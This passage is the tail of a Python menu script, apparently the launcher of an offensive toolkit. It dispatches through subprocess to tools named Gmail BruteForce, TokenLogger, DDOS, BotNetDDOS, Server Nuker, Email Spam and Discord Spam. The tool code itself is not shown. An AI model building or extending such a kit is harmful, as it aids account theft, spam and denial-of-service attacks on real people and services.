BruteForce": 97 | subprocess.call(["python", "Tools/Gmail BruteForce.py"]) 98 | elif script_name == "Server Nuker": 99 | subprocess.call(["python", "Tools/Server Nuker.py"]) 100 | elif script_name == "Email Spam": 101 | subprocess.call(["python", "Tools/Email Spam.py"]) 102 | elif script_name == "ImageLogger": 103 | subprocess.call(["python", "Tools/ImageLogger.py"]) 104 | elif script_name == "TokenLogger": 105 | subprocess.call(["python", "Tools/TokenLogger.py"]) 106 | elif script_name == "DDOS": 107 | subprocess.call(["python", "Tools/DDOS.py"]) 108 | elif script_name == "NitroGen": 109 | subprocess.call(["python", "Tools/NitroGen.py"]) 110 | elif script_name == "ServerJoiner": 111 | subprocess.call(["python", "Tools/ServerJoiner.py"]) 112 | elif script_name == "TokenGen": 113 | subprocess.call(["python", "Tools/TokenGen.py"]) 114 | elif script_name == "Discord Spam": 115 | subprocess.call(["python", "Tools/Discord Spam.py"]) 116 | elif script_name == "ID To Token": 117 | subprocess.call(["python", "Tools/ID To Token.py"]) 118 | elif script_name == "Token Checker": 119 | subprocess.call(["python", "Tools/Token Checker.py"]) 120 | elif script_name == "BotNetDDOS": 121 | subprocess.call(["python", "Tools/BotNetDDOS.py"]) 122 | elif script_name == "Stresser": 123 | subprocess.call(["python", "Tools/Stresser.py"]) 124 | elif script_name == "IP Pinger": 125 | subprocess.call(["python", "Tools/IP Pinger.py"]) 126 | 127 | except: 128 | print 129 | 130 | if __name__ == "__main__": 131 | menu() 132 | --------------------------------------------------------------------------------